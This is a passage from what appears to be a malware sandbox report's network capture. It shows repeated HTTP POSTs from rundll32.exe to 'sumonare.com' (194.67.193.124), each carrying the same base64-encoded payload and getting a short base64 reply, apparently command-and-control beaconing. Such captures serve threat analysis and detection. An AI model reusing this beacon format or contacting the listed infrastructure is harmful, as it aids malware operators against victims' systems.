                Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 35 55 6e 5a 79 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6c 70 4d 6c 56 47 56 6a 68 75 62 46 4a 32 5a 46 46 30 54 7a 68 6e 51 30 39 71 4e 6c 64 7a 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 49 33 51 31 67 32 49 69 77 69 64 6d 39 4b 59 79 49 36 49 69 74 52 53 48 70 4e 51 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 6c 52 5a 6c 68 4e 5a 32 4d 31 4b 31 64 75 5a 56 4e 7a 4b 32 67 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 36 5a 33 4a 56 54 32 64 56 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 47 56 47 78 43 51 55 70 72 63 33 70 68 53 45 4e 69 4d 30 4e 32 4d 6d 5a 61 4e 48 64 35 4d 6c 68 4d 54 54 46 53 55 58 64 4d 63 46 46 6e 55 6e 4d 35 4d 6b 52 48 4d 6d 4d 39 49 6e 30 3d
                Data Ascii: data=eyJDS3oiOiJ5UnZyIiwiRnN0TCI6InlpMlVGVjhubFJ2ZFF0TzhnQ09qNldzPSIsInZZdEIiOiI3Q1g2Iiwidm9KYyI6IitRSHpNQT09Iiwid0FjSCI6InlRZlhNZ2M1K1duZVNzK2giLCJ4ZUNjalMiOiJ6Z3JVT2dVPSIsInlpaVVYWSI6InpGVGxCQUprc3phSENiM0N2MmZaNHd5MlhMTTFSUXdMcFFnUnM5MkRHMmM9In0=
                Sep 28, 2024 03:22:32.015115023 CEST218INHTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:22:31 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                X-Powered-By: PHP/8.2.12
                Content-Length: 20
                Content-Type: text/html; charset=UTF-8
                Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 51 31 67 32 49 6e 30 3d
                Data Ascii: eyJUUGQiOiI3Q1g2In0=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                4192.168.2.749715194.67.193.1244337356C:\Windows\SysWOW64\rundll32.exe
                TimestampBytes transferredDirectionData
                Sep 28, 2024 03:22:32.159907103 CEST455OUTPOST /projects/cloud-solutions/api-v2/index.php HTTP/1.1
                User-Agent: Microsoft-WNS/10.0
                Host: sumonare.com
                Content-Length: 249
                Content-Type: application/x-www-form-urlencoded
                Accept-Language: fr-CA
                Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 35 55 6e 5a 79 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6c 70 4d 6c 56 47 56 6a 68 75 62 46 4a 32 5a 46 46 30 54 7a 68 6e 51 30 39 71 4e 6c 64 7a 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 49 33 51 31 67 32 49 69 77 69 64 6d 39 4b 59 79 49 36 49 69 74 52 53 48 70 4e 51 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 6c 52 5a 6c 68 4e 5a 32 4d 31 4b 31 64 75 5a 56 4e 7a 4b 32 67 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 36 5a 33 4a 56 54 32 64 56 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 47 56 47 78 43 51 55 70 72 63 33 70 68 53 45 4e 69 4d 30 4e 32 4d 6d 5a 61 4e 48 64 35 4d 6c 68 4d 54 54 46 53 55 58 64 4d 63 46 46 6e 55 6e 4d 35 4d 6b 52 48 4d 6d 4d 39 49 6e 30 3d
                Data Ascii: data=eyJDS3oiOiJ5UnZyIiwiRnN0TCI6InlpMlVGVjhubFJ2ZFF0TzhnQ09qNldzPSIsInZZdEIiOiI3Q1g2Iiwidm9KYyI6IitRSHpNQT09Iiwid0FjSCI6InlRZlhNZ2M1K1duZVNzK2giLCJ4ZUNjalMiOiJ6Z3JVT2dVPSIsInlpaVVYWSI6InpGVGxCQUprc3phSENiM0N2MmZaNHd5MlhMTTFSUXdMcFFnUnM5MkRHMmM9In0=
                Sep 28, 2024 03:22:32.988341093 CEST218INHTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:22:32 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                X-Powered-By: PHP/8.2.12
                Content-Length: 20
                Content-Type: text/html; charset=UTF-8
                Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 51 31 67 32 49 6e 30 3d
                Data Ascii: eyJUUGQiOiI3Q1g2In0=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                5192.168.2.749717194.67.193.1244337356C:\Windows\SysWOW64\rundll32.exe
                TimestampBytes transferredDirectionData
                Sep 28, 2024 03:22:33.144759893 CEST455OUTPOST /projects/cloud-solutions/api-v2/index.php HTTP/1.1
                User-Agent: Microsoft-WNS/10.0
                Host: sumonare.com
                Content-Length: 249
                Content-Type: application/x-www-form-urlencoded
                Accept-Language: fr-CA
                Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 35 55 6e 5a 79 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6c 70 4d 6c 56 47 56 6a 68 75 62 46 4a 32 5a 46 46 30 54 7a 68 6e 51 30 39 71 4e 6c 64 7a 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 49 33 51 31 67 32 49 69 77 69 64 6d 39 4b 59 79 49 36 49 69 74 52 53 48 70 4e 51 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 6c 52 5a 6c 68 4e 5a 32 4d 31 4b 31 64 75 5a 56 4e 7a 4b 32 67 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 36 5a 33 4a 56 54 32 64 56 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 47 56 47 78 43 51 55 70 72 63 33 70 68 53 45 4e 69 4d 30 4e 32 4d 6d 5a 61 4e 48 64 35 4d 6c 68 4d 54 54 46 53 55 58 64 4d 63 46 46 6e 55 6e 4d 35 4d 6b 52 48 4d 6d 4d 39 49 6e 30 3d
                Data Ascii: data=eyJDS3oiOiJ5UnZyIiwiRnN0TCI6InlpMlVGVjhubFJ2ZFF0TzhnQ09qNldzPSIsInZZdEIiOiI3Q1g2Iiwidm9KYyI6IitRSHpNQT09Iiwid0FjSCI6InlRZlhNZ2M1K1duZVNzK2giLCJ4ZUNjalMiOiJ6Z3JVT2dVPSIsInlpaVVYWSI6InpGVGxCQUprc3phSENiM0N2MmZaNHd5MlhMTTFSUXdMcFFnUnM5MkRHMmM9In0=
                Sep 28, 2024 03:22:33.952721119 CEST218INHTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:22:33 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                X-Powered-By: PHP/8.2.12
                Content-Length: 20
                Content-Type: text/html; charset=UTF-8
                Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 51 31 67 32 49 6e 30 3d
                Data Ascii: eyJUUGQiOiI3Q1g2In0=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                6192.168.2.749718194.67.193.1244337356C:\Windows\SysWOW64\rundll32.exe
                TimestampBytes transferredDirectionData
                Sep 28, 2024 03:22:34.100917101 CEST455OUTPOST /projects/cloud-solutions/api-v2/index.php HTTP/1.1
                User-Agent: Microsoft-WNS/10.0
                Host: sumonare.com
                Content-Length: 249
                Content-Type: application/x-www-form-urlencoded
                Accept-Language: fr-CA
                Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 35 55 6e 5a 79 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6c 70 4d 6c 56 47 56 6a 68 75 62 46 4a 32 5a 46 46 30 54 7a 68 6e 51 30 39 71 4e 6c 64 7a 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 49 33 51 31 67 32 49 69 77 69 64 6d 39 4b 59 79 49 36 49 69 74 52 53 48 70 4e 51 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 6c 52 5a 6c 68 4e 5a 32 4d 31 4b 31 64 75 5a 56 4e 7a 4b 32 67 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 36 5a 33 4a 56 54 32 64 56 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 47 56 47 78 43 51 55 70 72 63 33 70 68 53 45 4e 69 4d 30 4e 32 4d 6d 5a 61 4e 48 64 35 4d 6c 68 4d 54 54 46 53 55 58 64 4d 63 46 46 6e 55 6e 4d 35 4d 6b 52 48 4d 6d 4d 39 49 6e 30 3d
                Data Ascii: data=eyJDS3oiOiJ5UnZyIiwiRnN0TCI6InlpMlVGVjhubFJ2ZFF0TzhnQ09qNldzPSIsInZZdEIiOiI3Q1g2Iiwidm9KYyI6IitRSHpNQT09Iiwid0FjSCI6InlRZlhNZ2M1K1duZVNzK2giLCJ4ZUNjalMiOiJ6Z3JVT2dVPSIsInlpaVVYWSI6InpGVGxCQUprc3phSENiM0N2MmZaNHd5MlhMTTFSUXdMcFFnUnM5MkRHMmM9In0=
                Sep 28, 2024 03:22:34.902488947 CEST218INHTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:22:34 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                X-Powered-By: PHP/8.2.12
                Content-Length: 20
                Content-Type: text/html; charset=UTF-8
                Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 51 31 67 32 49 6e 30 3d
                Data Ascii: eyJUUGQiOiI3Q1g2In0=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                7192.168.2.749720194.67.193.1244337356C:\Windows\SysWOW64\rundll32.exe
                TimestampBytes transferredDirectionData
                Sep 28, 2024 03:22:35.050767899 CEST455OUTPOST /projects/cloud-solutions/api-v2/index.php HTTP/1.1
                User-Agent: Microsoft-WNS/10.0
                Host: sumonare.com
                Content-Length: 249
                Content-Type: application/x-www-form-urlencoded
                Accept-Language: fr-CA
                Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 35 55 6e 5a 79 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6c 70 4d 6c 56 47 56 6a 68 75 62 46 4a 32 5a 46 46 30 54 7a 68 6e 51 30 39 71 4e 6c 64 7a 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 49 33 51 31 67 32 49 69 77 69 64 6d 39 4b 59 79 49 36 49 69 74 52 53 48 70 4e 51 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 6c 52 5a 6c 68 4e 5a 32 4d 31 4b 31 64 75 5a 56 4e 7a 4b 32 67 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 36 5a 33 4a 56 54 32 64 56 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 47 56 47 78 43 51 55 70 72 63 33 70 68 53 45 4e 69 4d 30 4e 32 4d 6d 5a 61 4e 48 64 35 4d 6c 68 4d 54 54 46 53 55 58 64 4d 63 46 46 6e 55 6e 4d 35 4d 6b 52 48 4d 6d 4d 39 49 6e 30 3d
                Data Ascii: data=eyJDS3oiOiJ5UnZyIiwiRnN0TCI6InlpMlVGVjhubFJ2ZFF0TzhnQ09qNldzPSIsInZZdEIiOiI3Q1g2Iiwidm9KYyI6IitRSHpNQT09Iiwid0FjSCI6InlRZlhNZ2M1K1duZVNzK2giLCJ4ZUNjalMiOiJ6Z3JVT2dVPSIsInlpaVVYWSI6InpGVGxCQUprc3phSENiM0N2MmZaNHd5MlhMTTFSUXdMcFFnUnM5MkRHMmM9In0=
                Sep 28, 2024 03:22:36.019630909 CEST218INHTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:22:35 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                X-Powered-By: PHP/8.2.12
                Content-Length: 20
                Content-Type: text/html; charset=UTF-8
                Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 51 31 67 32 49 6e 30 3d
                Data Ascii: eyJUUGQiOiI3Q1g2In0=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                8192.168.2.749723194.67.193.1244337356C:\Windows\SysWOW64\rundll32.exe
                TimestampBytes transferredDirectionData
                Sep 28, 2024 03:22:36.208633900 CEST455OUTPOST /projects/cloud-solutions/api-v2/index.php HTTP/1.1
                User-Agent: Microsoft-WNS/10.0
                Host: sumonare.com
                Content-Length: 249
                Content-Type: application/x-www-form-urlencoded
                Accept-Language: fr-CA
                Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 35 55 6e 5a 79 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6c 70 4d 6c 56 47 56 6a 68 75 62 46 4a 32 5a 46 46 30 54 7a 68 6e 51 30 39 71 4e 6c 64 7a 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 49 33 51 31 67 32 49 69 77 69 64 6d 39 4b 59 79 49 36 49 69 74 52 53 48 70 4e 51 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 6c 52 5a 6c 68 4e 5a 32 4d 31 4b 31 64 75 5a 56 4e 7a 4b 32 67 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 36 5a 33 4a 56 54 32 64 56 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 47 56 47 78 43 51 55 70 72 63 33 70 68 53 45 4e 69 4d 30 4e 32 4d 6d 5a 61 4e 48 64 35 4d 6c 68 4d 54 54 46 53 55 58 64 4d 63 46 46 6e 55 6e 4d 35 4d 6b 52 48 4d 6d 4d 39 49 6e 30 3d
                Data Ascii: data=eyJDS3oiOiJ5UnZyIiwiRnN0TCI6InlpMlVGVjhubFJ2ZFF0TzhnQ09qNldzPSIsInZZdEIiOiI3Q1g2Iiwidm9KYyI6IitRSHpNQT09Iiwid0FjSCI6InlRZlhNZ2M1K1duZVNzK2giLCJ4ZUNjalMiOiJ6Z3JVT2dVPSIsInlpaVVYWSI6InpGVGxCQUprc3phSENiM0N2MmZaNHd5MlhMTTFSUXdMcFFnUnM5MkRHMmM9In0=
                Sep 28, 2024 03:22:37.026087046 CEST218INHTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:22:36 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                X-Powered-By: PHP/8.2.12
                Content-Length: 20
                Content-Type: text/html; charset=UTF-8
                Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 51 31 67 32 49 6e 30 3d
                Data Ascii: eyJUUGQiOiI3Q1g2In0=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                9192.168.2.749724194.67.193.1244337356C:\Windows\SysWOW64\rundll32.exe
                TimestampBytes transferredDirectionData
                Sep 28, 2024 03:22:37.176040888 CEST455OUTPOST /projects/cloud-solutions/api-v2/index.php HTTP/1.1
                User-Agent: Microsoft-WNS/10.0
                Host: sumonare.com
                Content-Length: 249
                Content-Type: application/x-www-form-urlencoded
                Accept-Language: fr-CA
                Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 35 55 6e 5a 79 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6c 70 4d 6c 56 47 56 6a 68 75 62 46 4a 32 5a 46 46 30 54 7a 68 6e 51 30 39 71 4e 6c 64 7a 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 49 33 51 31 67 32 49 69 77 69 64 6d 39 4b 59 79 49 36 49 69 74 52 53 48 70 4e 51 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 6c 52 5a 6c 68 4e 5a 32 4d 31 4b 31 64 75 5a 56 4e 7a 4b 32 67 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 36 5a 33 4a 56 54 32 64 56 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 47 56 47 78 43 51 55 70 72 63 33 70 68 53 45 4e 69 4d 30 4e 32 4d 6d 5a 61 4e 48 64 35 4d 6c 68 4d 54 54 46 53 55 58 64 4d 63 46 46 6e 55 6e 4d 35 4d 6b 52 48 4d 6d 4d 39 49 6e 30 3d
                Data Ascii: data=eyJDS3oiOiJ5UnZyIiwiRnN0TCI6InlpMlVGVjhubFJ2ZFF0TzhnQ09qNldzPSIsInZZdEIiOiI3Q1g2Iiwidm9KYyI6IitRSHpNQT09Iiwid0FjSCI6InlRZlhNZ2M1K1duZVNzK2giLCJ4ZUNjalMiOiJ6Z3JVT2dVPSIsInlpaVVYWSI6InpGVGxCQUprc3phSENiM0N2MmZaNHd5MlhMTTFSUXdMcFFnUnM5MkRHMmM9In0=
                Sep 28, 2024 03:22:38.004112005 CEST218INHTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:22:37 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                X-Powered-By: PHP/8.2.12
                Content-Length: 20
                Content-Type: text/html; charset=UTF-8
                Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 51 31 67 32 49 6e 30 3d
                Data Ascii: eyJUUGQiOiI3Q1g2In0=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                10192.168.2.749726194.67.193.1244337356C:\Windows\SysWOW64\rundll32.exe
                TimestampBytes transferredDirectionData
                Sep 28, 2024 03:22:38.160192966 CEST455OUTPOST /projects/cloud-solutions/api-v2/index.php HTTP/1.1
                User-Agent: Microsoft-WNS/10.0
                Host: sumonare.com
                Content-Length: 249
                Content-Type: application/x-www-form-urlencoded
                Accept-Language: fr-CA
                Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 35 55 6e 5a 79 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6c 70 4d 6c 56 47 56 6a 68 75 62 46 4a 32 5a 46 46 30 54 7a 68 6e 51 30 39 71 4e 6c 64 7a 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 49 33 51 31 67 32 49 69 77 69 64 6d 39 4b 59 79 49 36 49 69 74 52 53 48 70 4e 51 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 6c 52 5a 6c 68 4e 5a 32 4d 31 4b 31 64 75 5a 56 4e 7a 4b 32 67 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 36 5a 33 4a 56 54 32 64 56 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 47 56 47 78 43 51 55 70 72 63 33 70 68 53 45 4e 69 4d 30 4e 32 4d 6d 5a 61 4e 48 64 35 4d 6c 68 4d 54 54 46 53 55 58 64 4d 63 46 46 6e 55 6e 4d 35 4d 6b 52 48 4d 6d 4d 39 49 6e 30 3d
                Data Ascii: data=eyJDS3oiOiJ5UnZyIiwiRnN0TCI6InlpMlVGVjhubFJ2ZFF0TzhnQ09qNldzPSIsInZZdEIiOiI3Q1g2Iiwidm9KYyI6IitRSHpNQT09Iiwid0FjSCI6InlRZlhNZ2M1K1duZVNzK2giLCJ4ZUNjalMiOiJ6Z3JVT2dVPSIsInlpaVVYWSI6InpGVGxCQUprc3phSENiM0N2MmZaNHd5MlhMTTFSUXdMcFFnUnM5MkRHMmM9In0=
                Sep 28, 2024 03:22:38.986918926 CEST218INHTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:22:38 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                X-Powered-By: PHP/8.2.12
                Content-Length: 20
                Content-Type: text/html; charset=UTF-8
                Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 51 31 67 32 49 6e 30 3d
                Data Ascii: eyJUUGQiOiI3Q1g2In0=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                11192.168.2.749729194.67.193.1244337356C:\Windows\SysWOW64\rundll32.exe
                TimestampBytes transferredDirectionData
                Sep 28, 2024 03:22:39.129766941 CEST455OUTPOST /projects/cloud-solutions/api-v2/index.php HTTP/1.1
                User-Agent: Microsoft-WNS/10.0
                Host: sumonare.com
                Content-Length: 249
                Content-Type: application/x-www-form-urlencoded
                Accept-Language: fr-CA
                Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 35 55 6e 5a 79 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6c 70 4d 6c 56 47 56 6a 68 75 62 46 4a 32 5a 46 46 30 54 7a 68 6e 51 30 39 71 4e 6c 64 7a 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 49 33 51 31 67 32 49 69 77 69 64 6d 39 4b 59 79 49 36 49 69 74 52 53 48 70 4e 51 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 6c 52 5a 6c 68 4e 5a 32 4d 31 4b 31 64 75 5a 56 4e 7a 4b 32 67 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 36 5a 33 4a 56 54 32 64 56 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 47 56 47 78 43 51 55 70 72 63 33 70 68 53 45 4e 69 4d 30 4e 32 4d 6d 5a 61 4e 48 64 35 4d 6c 68 4d 54 54 46 53 55 58 64 4d 63 46 46 6e 55 6e 4d 35 4d 6b 52 48 4d 6d 4d 39 49 6e 30 3d
                Data Ascii: data=eyJDS3oiOiJ5UnZyIiwiRnN0TCI6InlpMlVGVjhubFJ2ZFF0TzhnQ09qNldzPSIsInZZdEIiOiI3Q1g2Iiwidm9KYyI6IitRSHpNQT09Iiwid0FjSCI6InlRZlhNZ2M1K1duZVNzK2giLCJ4ZUNjalMiOiJ6Z3JVT2dVPSIsInlpaVVYWSI6InpGVGxCQUprc3phSENiM0N2MmZaNHd5MlhMTTFSUXdMcFFnUnM5MkRHMmM9In0=
                Sep 28, 2024 03:22:39.953084946 CEST218INHTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:22:39 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                X-Powered-By: PHP/8.2.12
                Content-Length: 20
                Content-Type: text/html; charset=UTF-8
                Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 51 31 67 32 49 6e 30 3d
                Data Ascii: eyJUUGQiOiI3Q1g2In0=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                12192.168.2.749731194.67.193.1244337356C:\Windows\SysWOW64\rundll32.exe
                TimestampBytes transferredDirectionData
                Sep 28, 2024 03:22:40.102633953 CEST455OUTPOST /projects/cloud-solutions/api-v2/index.php HTTP/1.1
                User-Agent: Microsoft-WNS/10.0
                Host: sumonare.com
                Content-Length: 249
                Content-Type: application/x-www-form-urlencoded
                Accept-Language: fr-CA
                Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 35 55 6e 5a 79 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6c 70 4d 6c 56 47 56 6a 68 75 62 46 4a 32 5a 46 46 30 54 7a 68 6e 51 30 39 71 4e 6c 64 7a 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 49 33 51 31 67 32 49 69 77 69 64 6d 39 4b 59 79 49 36 49 69 74 52 53 48 70 4e 51 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 6c 52 5a 6c 68 4e 5a 32 4d 31 4b 31 64 75 5a 56 4e 7a 4b 32 67 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 36 5a 33 4a 56 54 32 64 56 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 47 56 47 78 43 51 55 70 72 63 33 70 68 53 45 4e 69 4d 30 4e 32 4d 6d 5a 61 4e 48 64 35 4d 6c 68 4d 54 54 46 53 55 58 64 4d 63 46 46 6e 55 6e 4d 35 4d 6b 52 48 4d 6d 4d 39 49 6e 30 3d
                Data Ascii: data=eyJDS3oiOiJ5UnZyIiwiRnN0TCI6InlpMlVGVjhubFJ2ZFF0TzhnQ09qNldzPSIsInZZdEIiOiI3Q1g2Iiwidm9KYyI6IitRSHpNQT09Iiwid0FjSCI6InlRZlhNZ2M1K1duZVNzK2giLCJ4ZUNjalMiOiJ6Z3JVT2dVPSIsInlpaVVYWSI6InpGVGxCQUprc3phSENiM0N2MmZaNHd5MlhMTTFSUXdMcFFnUnM5MkRHMmM9In0=
                Sep 28, 2024 03:22:40.922015905 CEST218INHTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:22:40 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                X-Powered-By: PHP/8.2.12
                Content-Length: 20
                Content-Type: text/html; charset=UTF-8
                Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 51 31 67 32 49 6e 30 3d
                Data Ascii: eyJUUGQiOiI3Q1g2In0=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                13192.168.2.749733194.67.193.1244337356C:\Windows\SysWOW64\rundll32.exe
                TimestampBytes transferredDirectionData
                Sep 28, 2024 03:22:41.085827112 CEST455OUTPOST /projects/cloud-solutions/api-v2/index.php HTTP/1.1
                User-Agent: Microsoft-WNS/10.0
                Host: sumonare.com
                Content-Length: 249
                Content-Type: application/x-www-form-urlencoded
                Accept-Language: fr-CA
                Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 35 55 6e 5a 79 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6c 70 4d 6c 56 47 56 6a 68 75 62 46 4a 32 5a 46 46 30 54 7a 68 6e 51 30 39 71 4e 6c 64 7a 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 49 33 51 31 67 32 49 69 77 69 64 6d 39 4b 59 79 49 36 49 69 74 52 53 48 70 4e 51 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 6c 52 5a 6c 68 4e 5a 32 4d 31 4b 31 64 75 5a 56 4e 7a 4b 32 67 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 36 5a 33 4a 56 54 32 64 56 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 47 56 47 78 43 51 55 70 72 63 33 70 68 53 45 4e 69 4d 30 4e 32 4d 6d 5a 61 4e 48 64 35 4d 6c 68 4d 54 54 46 53 55 58 64 4d 63 46 46 6e 55 6e 4d 35 4d 6b 52 48 4d 6d 4d 39 49 6e 30 3d
                Data Ascii: data=eyJDS3oiOiJ5UnZyIiwiRnN0TCI6InlpMlVGVjhubFJ2ZFF0TzhnQ09qNldzPSIsInZZdEIiOiI3Q1g2Iiwidm9KYyI6IitRSHpNQT09Iiwid0FjSCI6InlRZlhNZ2M1K1duZVNzK2giLCJ4ZUNjalMiOiJ6Z3JVT2dVPSIsInlpaVVYWSI6InpGVGxCQUprc3phSENiM0N2MmZaNHd5MlhMTTFSUXdMcFFnUnM5MkRHMmM9In0=
                Sep 28, 2024 03:22:41.919951916 CEST218INHTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:22:41 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                X-Powered-By: PHP/8.2.12
                Content-Length: 20
                Content-Type: text/html; charset=UTF-8
                Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 51 31 67 32 49 6e 30 3d
                Data Ascii: eyJUUGQiOiI3Q1g2In0=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                14192.168.2.749734194.67.193.1244337356C:\Windows\SysWOW64\rundll32.exe
                TimestampBytes transferredDirectionData
                Sep 28, 2024 03:22:42.077712059 CEST455OUTPOST /projects/cloud-solutions/api-v2/index.php HTTP/1.1
                User-Agent: Microsoft-WNS/10.0
                Host: sumonare.com
                Content-Length: 249
                Content-Type: application/x-www-form-urlencoded
                Accept-Language: fr-CA
                Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 35 55 6e 5a 79 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6c 70 4d 6c 56 47 56 6a 68 75 62 46 4a 32 5a 46 46 30 54 7a 68 6e 51 30 39 71 4e 6c 64 7a 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 49 33 51 31 67 32 49 69 77 69 64 6d 39 4b 59 79 49 36 49 69 74 52 53 48 70 4e 51 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 6c 52 5a 6c 68 4e 5a 32 4d 31 4b 31 64 75 5a 56 4e 7a 4b 32 67 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 36 5a 33 4a 56 54 32 64 56 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 47 56 47 78 43 51 55 70 72 63 33 70 68 53 45 4e 69 4d 30 4e 32 4d 6d 5a 61 4e 48 64 35 4d 6c 68 4d 54 54 46 53 55 58 64 4d 63 46 46 6e 55 6e 4d 35 4d 6b 52 48 4d 6d 4d 39 49 6e 30 3d
